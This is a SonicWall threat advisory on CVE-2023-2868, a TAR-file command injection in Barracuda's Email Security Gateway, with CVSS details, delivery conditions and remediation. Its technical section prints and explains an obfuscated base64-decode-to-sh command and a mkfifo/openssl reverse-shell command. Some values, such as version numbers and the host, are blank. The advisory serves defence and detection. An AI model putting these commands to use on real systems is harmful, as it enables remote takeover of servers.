Barracuda ES Gateway Reverse Shell Vulnerability



  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as spam, viruses, phishing, DoS attacks, and data leaks. It is available in physical and virtual forms and offers thorough inbound and outbound email filtering, data leak prevention, and email encryption. It also boasts advanced features like protection against sophisticated threats like ransomware and zero-day attacks. In addition, it employs an outbound filtering system to avert data loss and uphold the reputation of your email server’s IP address.

  The appliance form factor of the Barracuda Email Security Gateway pertains to its physical variant, a standalone device installable directly into an organization’s network infrastructure.

  A remote command injection vulnerability has been discovered in the Barracuda Email Security Gateway product, affecting versions to This vulnerability stems from an insufficient sanitization process of .tar files (tape archives).

  This vulnerability could be exploited by a remote, unauthenticated attacker by sending a specially crafted TAR file to the targeted device. A successful attack could result in a reverse shell against the targeted server, thus compromising its security.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2868.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Inside the TAR file, you will see the following string:
  The script provided is a shell command that decodes a base64 encoded string and then executes the result. Here’s a detailed breakdown of what the command does:

  • abcdefg=: This sets the variable abcdefg to a base64 encoded string.
  • ee=ba: This sets the variable ee to the string ba.
  • G=s: This sets the variable G to the string s.
  • "ech"o $abcdefg|${ee}se64 -d|${G}h: This part of the command is using some obfuscation. If we substitute ee with ba and G with s, we get "ech"o $abcdefg | base64 -d | sh.
    1. "ech"o $abcdefg: This echoes the base64 encoded string stored in abcdefg.
    2. base64 -d: This decodes the base64 encoded string.
    3. sh: This executes the resulting decoded command string using sh.
  • wh66489.txt: This command doesn’t seem to have any context related to the rest of the script and it doesn’t appear to be a valid command by itself. If it was intended to redirect the output to a file named wh66489.txt, then it would require a > before the filename like this > wh66489.txt.

 If we decode the base64 string abcdefg using the command "ech"o $abcdefg | base64 -d, we get:

 This command is creating a reverse shell that connects to a specified host over a secure SSL/TLS connection.

 The breakdown of the reverse shell commands:

  • setsid: This command is used to run a new session in Unix and Unix-like operating systems. This ensures that the command continues running even if the terminal is closed.
  • sh -c: The sh -c command is used to run a shell (sh) with a command string (-c option). Here, the string within the quotes is the command string that sh is going to execute.
  • mkfifo /tmp/p: The mkfifo command creates a named pipe with the name /tmp/p. Pipes are used to direct the output from one command as input to another. Named pipes, like /tmp/p, can be used by multiple processes for communication.
  • sh -i < /tmp/p 2>&1|openssl s_client -quiet -connect > /tmp/p 2>/dev/null: This is a compound command.
    1. sh -i < /tmp/p 2>&1: The sh -i command starts an interactive shell. The < /tmp/p redirects the input of this shell from the named pipe we created earlier.
    2. The 2>&1 redirects standard error (2) to standard output (1).
    3. Therefore, both the error messages and standard output from the sh -i command are sent to the pipe /tmp/p.
    4. The | character pipes the output from the preceding command as the input to the next command.
    5. openssl s_client -quiet -connect The openssl s_client command starts a SSL/TLS client that connects to an SSL/TLS server. The -quiet option suppresses most of the output. The -connect option specifies the host and port to connect to, here
    6. > /tmp/p 2>/dev/null: This part is redirecting the standard output to the named pipe (/tmp/p) and discarding the standard error by directing it to /dev/null.
  • rm /tmp/p: Finally, after the connection is terminated, this command removes the named pipe /tmp/p.

 The overall purpose of this command is to create a reverse shell that connects to a specified host over a secure SSL/TLS connection. The connection is kept alive even if the terminal is closed due to the setsid command.

Triggering the Problem:

  • The target system must have the Barracuda Email Security Gateway versions
  • The attacker must have network connectivity to the affected ports.
  • The attacker must send malicious attachments designed to exploit CVE-2023-2868 to gain initial access.

Triggering Conditions:

  For emails targeting Barracuda Email Security Gateway middleboxes and transmitted over SMTP or ESMTP, it is crucial to attach files with the extension ".tar" in their filename. Alternatively, using other extensions such as ".jpg" or ".dat" is acceptable, as long as they contain valid ".tar" file content for exploitation.

  Note that ".tar" file attachments crafted as valid exploits have the potential to execute a reverse shell payload on certain ESG appliances during the email attachment screening process.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMTP
    • ESMTP
  Exploit chain related malware components will be installed over HTTP/HTTPs.

  Reverse Shell File Content:

SonicWall's, Capture Labs, provides protection against this threat:

  • GAV: 18479 CVE-2023-2868.A

  • GAV: 17928 Saltwater.A

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory #1
  Vendor Advisory #2

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.